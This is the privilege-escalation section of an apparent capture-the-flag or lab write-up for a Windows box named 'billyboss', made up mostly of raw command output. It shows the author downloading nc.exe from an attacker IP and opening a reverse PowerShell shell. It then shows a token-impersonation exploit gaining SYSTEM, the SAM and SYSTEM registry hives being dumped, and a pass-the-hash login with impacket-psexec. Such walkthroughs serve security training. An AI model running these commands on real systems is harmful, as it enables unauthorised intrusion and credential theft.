Priv Esc
PS C:\Users\nathan\Nexus\nexus-3.21.0-05> whoami /all
USER INFORMATION
----------------
User Name SID
================ ==============================================
billyboss\nathan S-1-5-21-2389609380-2620298947-1153829925-1001
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
==================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
PS C:\Users\nathan\Nexus\nexus-3.21.0-05> cd C:\programdata
PS C:\programdata> curl 192.168.45.233/nc.exe -o nc.exe
PS C:\programdata> ls
Directory: C:\programdata
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 5/28/2020 10:01 PM Microsoft
d----- 5/25/2020 9:07 AM Microsoft OneDrive
d----- 5/9/2022 4:22 AM Package Cache
d----- 5/25/2020 9:23 AM Packages
d----- 5/9/2022 4:45 AM regid.1991-06.com.microsoft
d----- 3/18/2019 9:52 PM SoftwareDistribution
d----- 5/26/2020 7:44 PM ssh
d----- 5/25/2020 8:44 PM USOPrivate
d----- 5/25/2020 9:01 AM USOShared
d----- 5/9/2022 4:23 AM VMware
d----- 3/18/2019 11:23 PM WindowsHolographicDevices
-a---- 8/16/2024 4:37 PM 59392 nc.exe
PS C:\programdata>
PS C:\programdata> .\nc.exe 192.168.45.233 1338 -e powershell.exe
Moved to a more stable shell
PS C:\programdata> .\privme.exe -cmd "reg.exe save HKLM\SAM C:\programdata\sam.bak"
.\privme.exe -cmd "reg.exe save HKLM\SAM C:\programdata\sam.bak"
[*] CombaseModule: 0x140724306640896
[*] DispatchTable: 0x140724308983392
[*] UseProtseqFunction: 0x140724308351424
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\7cc4030a-5068-4863-939e-83cd9c76831a\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 0000fc02-0d40-ffff-87d4-c5ca2e8c7e24
[*] DCOM obj OXID: 0x438547efeb56b29c
[*] DCOM obj OID: 0xc7ce3d93195558de
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 832 Token:0x784 User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 1628
The operation completed successfully.
PS C:\programdata>
PS C:\programdata> .\privme.exe -cmd "reg.exe save HKLM\SYSTEM C:\programdata\system.bak"
.\privme.exe -cmd "reg.exe save HKLM\SYSTEM C:\programdata\system.bak"
[*] CombaseModule: 0x140724306640896
[*] DispatchTable: 0x140724308983392
[*] UseProtseqFunction: 0x140724308351424
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\442203b4-d5fa-44a3-a116-2fcbae3095cf\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 0000f402-0fac-ffff-d895-26a1a0be0d6d
[*] DCOM obj OXID: 0x1df1e6bd5cea46d1
[*] DCOM obj OID: 0x723731170c8b4772
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 832 Token:0x784 User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 3384
The operation completed successfully.
$ impacket-psexec Administrator@192.168.165.61 -hashes :f1777d139f9e8721780d5e94136b54ca
Impacket v0.12.0.dev1+20240807.21946.829239e - Copyright 2023 Fortra
[*] Requesting shares on 192.168.165.61.....
[*] Found writable share ADMIN$
[*] Uploading file njVKHnDx.exe
[*] Opening SVCManager on 192.168.165.61.....
[*] Creating service HvEA on 192.168.165.61.....
[*] Starting service HvEA.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.18362.719]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> type C:\Users\Administrator\Desktop\proof.txt
fc41783718e1b5f8a1a39449590ba16b
C:\Windows\system32> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.165.61
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.165.254
C:\Windows\system32>
Last updated